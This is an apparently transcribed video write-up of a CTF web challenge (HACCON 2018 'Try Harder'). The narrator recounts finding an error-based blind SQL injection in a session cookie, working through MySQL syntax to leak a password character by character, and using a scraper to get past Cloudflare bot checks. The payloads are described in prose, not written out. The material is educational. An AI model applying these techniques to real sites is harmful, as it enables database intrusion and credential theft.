 Hello, Internet! This is kind of a video write-up for the challenge Try Harder for 150 points in the web category of HACCON CTF 2018. So full disclaimer, I say this is kind of a video write-up because this is a little different. I am not going to be writing code. I'm not going to be doing this kind of side-by-side with you. I'm actually going to be replaying some of the live raw footage while I was playing this competition. Very, very sped up, so epilepsy warning, I guess, and you'll see through all of the rabbit holes and missteps and everything that I took and me playing it live. Because the old service that originally came, was given this challenge from here, was given as an IP address, not a domain here, because it didn't have a whole lot of protections, I guess. I guess it just wasn't stable, because that hosted the website and it got hammered and brought down a lot. It was just unstable. So the CTF organizers decided, okay, let's host it somewhere else and let's put on this Cloudflare DDoS protection. So it uses the panic mode, I think. I think that's called. I think that's the name of it, where it will check your browser, make sure you're running JavaScript or whatever, and it will take five seconds to load the page. And it was Agony and is Agony for what this kind of challenge actually is, considering it's like blind airbase sequel injection. So I want to showcase it because I don't think there are a whole lot of video write-ups or even text write-ups. I haven't seen anything on this challenge before, but I wanted to give it to you so someone in the world covered it. But again, partial video write-up and that I don't get the full flag, I didn't finish this during the CTF, but understand and know the solution now after the game. So I still want to show it to you and hope you guys can bear with me for this. So I want to prove this to you. If I go to this URL, you'll see there's this Cloudflare DDoS protection and after a crap ton of time that's wasted, especially if you're trying to automate and attack, you'll get the web page. I will showcase, you can actually script this. Originally, myself and YgglesMoto and Monorail and other people that I was playing this with didn't think that we could script automating our interaction at the website because of that Cloudflare protection. We recently found this CF scrape GitHub that will allow us to do that just like that. If you want to Google that, you certainly can, but it's simple. It essentially just mocks the request library in Python, but will allow you to go through that CF like Cloudflare protection because it's, I don't know, pretending JavaScript or whatever. But that's handy. However, it still takes five seconds for it to return the page. So if I run this, it's going to do that Cloudflare check and eventually I'll get a page return. You can see I've just an exit saving here. Eventually I'll get the output of the web page. However, if I tried to do this for a blind sequel injection when I'm trying to leak information out, I don't want to wait five seconds for literally every single attack that I'm doing. So this is just agonizing and was not readily used and accessible for the game. The original script that I use, I just use the original website, the first one that they released. However, right now that is down. It is not up. So I cannot show you this attack like that. That's why I want to showcase the live footage that I recorded. So I'm sorry enough of me talking. This is probably going to be a super long video and I really apologize for that. But hopefully it'll be worth it showcasing cool, cool things. Let's play this video. So I'll speed this up. Again, epilepsy warning. You'll see a lot of discord notifications. You'll see me talking because this is my raw live footage. Shameless self advertisement. If you aren't in a discord server, please do. You can see the camaraderie, the brotherhood, the family-ness crap like that that we're doing right now. We're all in voice and I'm chatting with some of these other people that are attacking this with me. So off on the side, you can see my supply and text window. I've got you over the website creating a session, getting the cookie out. And we didn't, I didn't see this hint originally. It said, don't touch my cookie. But Yiggles pointed out to me that eventually when that was released, we noted it in there. I was actually just testing with the cookie involved and I don't think they were. But I got success with the cookie in there and they weren't. And I brought it up to them and they said, oh, okay, crap. That must be why it's actually in there. So we started to test because they found SQL injection in that cookie. And that was awesome. That gave us a little bit of a lead. Now we had to figure out what we were doing. You saw me just script there trying to connect to the Cloudflare one, but it just didn't work. So I went back to the old service. We didn't know about CF scrape at that time. We found it a day later and it still sucks. So do not CTF organizers and CTF planners do not put I'm under attack mode for Cloudflare on a SQL injection challenge. Pretty, pretty please. I understand the issue, but okay. So I am testing the cookie with a lot of SQL injection and I'm trying to determine what errors can I find. I'm seeing this truncated incorrect double value, which is the cookie down there. So I see interesting things are happening. I'm getting weird results and I showed this to people in the discord is like, I don't know why I got some of those values or some of those responses like try to brute force a list of possible account names, etc. That was really weird. But I am getting some errors out of it. So I kept testing and that's what a lot of this video is going to be where I'm just testing things. So I'm sorry, bear with me. Maybe you'll learn a few things because through this research and through what I've been trying to learn. I did pick up some interesting tidbits like this if syntax for my SQL. I had no idea that that was a thing and it's pretty handy. Especially if you do have a SQL injection vector and you're trying to blind SQL injection. Maybe this could be of use. So I actually ended up figuring out this condition set up where I would test a condition determine whether or not. Okay, that condition is true or whether or not that condition is false. And you'll see what I do in just a little bit here after I kind of get the hang in the syntax is I determine. Okay, let's just return a string or something that I know will air out with that truncated incorrect double value. Because for some reason that is always going to spit out an error. I can use that to test if my condition failed and I know I'll get a result. So okay, that's an inkling of blind SQL injection. Maybe I can weaponize that. Maybe I can use that to my advantage. So here I pull up my SQL injection cheat sheet. That's on my GitHub. I share it with my Discord. You're totally welcome to use it for sure as well. I found that to be very, very handy. If I have explicit SQL I or blind SQL I, I can use that to leak out any portion of a database that I particularly want to once I figured out an attack vector. Here I'm finding interesting things about the database like this unhackable dot. So unhackable being the database name and whatever I'm looking at being the table though that was pretty handy. I didn't end up using it at all. But again, doing this testing and fuzzing is awesome for doing whatever recon or enumeration or trying to figure out whatever we can here. I don't know what I'm doing at this point. Trying to determine if I can leak any other like tables out any other fields. And you can see I'm getting that occasional what error and that my condition didn't work. And I noticed that I was getting this row 64 was cut off by group concat. So it seemed to be like truncating what I was trying to leak out and that there were multiple rows. So I think I tested with like a limits without a dude like limit one, etc. And I after some other tinkering, I was able to find the version and I thought like, okay, that's actually returning a full on string. That's like essentially explicit SQL if I could actually get any traction with that. But I wasn't able to I showed this around to the guys in the discord server. But I wasn't able to get anything else with it. Even when I thought, can I get strings just straight up displayed to me? I even tried this. I went down this rabbit hole for a while. I was testing. Can I cast something as a string with Varchar or str or whatever functions that my SQL could offer for me. And I just couldn't get anywhere with it. So again, worthwhile testing, learning experience, whatever the whole point is to be banging your head against the wall long enough that something breaks through. And that's why this challenge is called try harder. That's why my script is called Ape because I am of the mindset where I throw stuff at the wall and see what sticks in this video itself is even an hour long. However, it does get cut off. So I don't want to be a disappointment here. But once I get the vulnerability, once I actually find the payload that will get a blind SQL injection query. For some reason, my keyboard just stops working and I have to reboot. I told everyone the discord server and it sucked. It was awful. But it was so exciting because after I reviewed it like, okay, let's weaponize this more. Let's leak out something else. I thought I had a little bit of an attack right here where I could get row, blah, blah, blah would be a success or otherwise to get my condition aired. But it wouldn't give me what I wanted. And I just didn't feel comfortable with that because I wasn't able to actually determine any password or ID field, etc, etc. So I saw this weird error that said you can't select this table users for update, etc. So it says I couldn't use anything, whatever as an update. And I thought, how can I get around that? I've never seen that error before. So this is where I researched. You see me on Stack Overflow and I learned a little bit about MySQL aliases where you can select a whole another table as something else. And just trying to kind of treat it as like a temporary variable that you can still look through. So I tried to see if I could get that right rather than selecting that table. I did select something from that table as alias. And I had to get the syntax right. I had to keep playing with parentheses here. So I ended up having with some disgusting payload and I'm really sorry for that. But I did get that to work. I was able to select all from users eventually with an alias set up. I think I needed a little extra set of parentheses. So I know my payload is getting very, very strange and it's probably hard to follow at this point. Again, I wanted to show you this because no one else has and maybe you'll learn a little bit from it even if it is like rapid fireworks on your screen. At this point, I try other ideas. I'm trying to change whether or not my or statement at the very beginning would be better effective as an and statement. I'm probably just going a little bit insane. I'm probably just scraping at straws. But again, that's the testing that I've got to be doing. I'm trying to do stupid conditionals like where one equals one, I know that should return something and where one equals two, I know that should air out. But it didn't seem like I was getting something. It didn't seem like where one equals two, it wouldn't return anything else. So I thought, okay, for some reason that is still evaluating correctly and I have no idea why. It probably was just returning a null response, which for whatever reason, my SQL was still willing to handle. So whatever. I wanted to use Union Select because that is my typical go-to for blind SQL injections. But again, this was just a weird challenge where it would convert everything to a double if it just kind of like hung out there in space. I promise I'll get to an actual working payload at some point. And I know you probably hate just listening to me talk right now. Whatever internet anxiety, whatever haters, trying to concatenate some things. These are just dead ends that I'm looking around at. Again, I'm trying my limit one to see if I can only get one response, not that row. Massive amount of numbers for whatever reason. At this point, I tried to see if I could force my SQL to throw an error because I didn't feel that comfortable with the condition. And you can see I kind of moved on from the if statement. So I kept trying to tinker with other things. Keep an eye on the clock here. You can see how long this is moving. You could also see the music that I was listening to. I like to listen to like retro wave or techno or EDM when I'm when I'm hacking when I'm going through CTFs and stuff. Eagles Moto started to try and do some like local file inclusion see if we could actually get responses with trying to read a file out. Didn't seem to get anything. With a try, I think we were just poking around in the SQL injection cheat sheet that I have whatever for our own learning purposes to. We're all here to learn. Please do join the Discord server if you're into this and you want to be part of a team and you want to be together with people that are just trying to get better, trying to improve, we're all passionate about it and stuff. I also personally welcome whoever joins the Discord server. You saw that notification just come up. So join the Discord server. I'll personally welcome you. It's cool. Subquery returns more than one row. Again, I try and limit things at this point. I think I get a little bit of a breakthrough where I'm determining that and will work and it's actually getting some results with password greater than or less than stupid things. Because I share this in the Discord server and that I'm excited about it because it looks like a lead. I'm able to actually get an error if the password equals null, which it doesn't, but I'm able to get a response if it's greater than something else. So like, okay, perfect. This is the makings of a blind SQL injection attack. Finally got a payload that does something. So I start to test this. I go ahead and get my thresholds ready where I've got an error cat. I'm sorry, an error caught or an error catched. Catched is not the right word or a success. And I can finally start to piece this together. So I thought originally like I can't trust any of the lists that I've created before. I'm just going to loop through the ASCII table. I'm just going to loop through numbers. I actually asked in my Discord server, hey, does anyone have an ASCII table or does anyone know it? And Monorail, you saw the notification up there. Googled an ASCII table for me. I felt like a shithead for not just doing it on my own. Thank you. Thank you, Monorail. I appreciate the teamwork, but we were just getting excited because we thought we had a weaponized attack. So I go ahead and open up another blind SQL injection script that I've had. Just grab a list of printable characters and I start to run through stuff. I realized that I had to switch where I was getting things appended right here. You can see I put it in the wrong section. I want to add a new character if I actually get an error. So I know that I've hit the threshold and I start to leak and I realize, oh crap. Okay. I'm not going to actually get lowercase letters in this case. I got a D. I got a four. So I know I'm getting the flag and I'm like, uh, I need lowercase. So let's just put binary in every single select statement I had to see what would hit. And eventually like nothing, nothing got it. So I was like, all right, fine. I'll remove all the, the binary and just go back to getting it in all caps. Cause I know it'll all be lowercase. That's what the flag format has been for these challenges. Starting to get the flag format, getting excited. My keyboard starts to break and I have no idea why I'm moving things around with my mouse because I just straight up can't type anything. I'm yelling at the guys in my discord server and something's weird. It got caught on a quotation mark and that was very strange. So video ended. I'm sorry because I had to reboot and I didn't record following that, but I started to leak out the flag and it gave me dark, uh, why with like four H's and four Y's and then an underscore and then SQL one exclamation point underscore and things started to get really weird and really wonky from that point on. I wasn't able to actually get anything following this segment. Uh, and I couldn't figure out why. Um, we literally were not able to get anything else to leak out. So what we actually ended up doing, if I can open the script here is we started to look for other IDs that weren't ID one. We figured, okay, ID one must have been whatever admin, but we thought like, is the rest of the flag stored somewhere else? And we started to test for like leak out things were ID equals two or ID equals three, et cetera, et cetera. And we were getting results and they started to look like hashes and we thought like, oh, whatever, that, that's probably just normal. That's probably just trying to make it simulate like a real world thing where passwords are stored in a hash and we didn't do anything with them. I think Yiggles Moto tried to, uh, crack the hash on one of them while we got like a portion of it leaked out and he said that like, oh, this like, this is a partial match for the letter R. I was like, what the heck? Okay. That's probably garbage because they probably just filling it with random data and at this point, there's like seven minutes left in the competition and we're freaking out because we're like, why isn't this working? Oh yeah, the S was a five. You can see me starting to get the list. Why couldn't we get the flag? Why was nothing else returning? What was going on when the rest of the attack was working just fine and as it turns out, as I went to talk with the admins later, I was just freaking out in the telegram like screaming. Are there any admins around and no one was there at the time. So the following morning after the game, it ended. We're all just pretty heartbroken because we really wanted to get this like hundred whatever garbage point challenge for that only like five people have solved and we looked, we felt like we had a lead and whatever. It just fell through. So in the morning, I chatted with the guys, explained that this was my payload, explained that it was weird that I wasn't getting anything else, explained that I was using the old service and he was like, oh, oh, oh, oh. It all happened because the new service, the one with the cloud for their domain is actually actually has the flag all on that one row. And we didn't know that nor could we particularly script. Well, that that cloud for their protected one, but in the old service, what they had was they had the rest of the flag stored in those other ID numbers like two, three, four of the things that we were leaking out as MD five hashes of each letter and Oh, that pissed me off so bad because we had it. We were literally looking at each segment of the flag once we got it to leak out. We saw a letter R and we didn't piece together that that was the rest of the flag just in different pieces. So again, I'm sorry, I can't show you this, but take my word for it. Once you have this payload group can cat select ID blah, blah, blah where ID equals this thing and password is greater than this and that's probably disgusting. It probably could be cleaner than this, but we got it to work with that and we were able to leak out a password and we were able to do the blind sequel error based sequel injection. So that first part of the flag that we got following had we been able to leak out the rest of those ID numbers had the game not ended had the game not been delayed a day and also cut down to 12 hours, whatever. I'm not bitter. Maybe we would have got the challenge. Awesome learning experience in my mind. We still solve it. We still attacked. We got the exploit that we got the payload and everything working. So I was really happy with it and I did want to share with you guys. I hope you were able to enjoy this video. Despite it being very weird and very strange. Thanks for watching. All right. Hey, quick shout out to the people that support me on Patreon. Thank you guys so much. One dollar or more on Patreon will give you a special shout out just like this at the end of every video. $5 or more on Patreon will give you early access to everything they release on YouTube before it goes live because I like to record in bulk and then gradually YouTube schedule the releases on a day by day basis or whatever. If you did like this video, please do like comment and subscribe, especially if you want to see more CTF video writeups and other programming tutorials. Please join our Discord server. It is an awesome family of CTF players, programmers and hackers and we're just open to everyone. We're going to be playing I CTF and Nighthawk CTF as they're coming. So yeah, come hang out with me and other cool people. I'd love to see you guys on Patreon. That would be phenomenal and I would love to see you in the next video. Thanks later.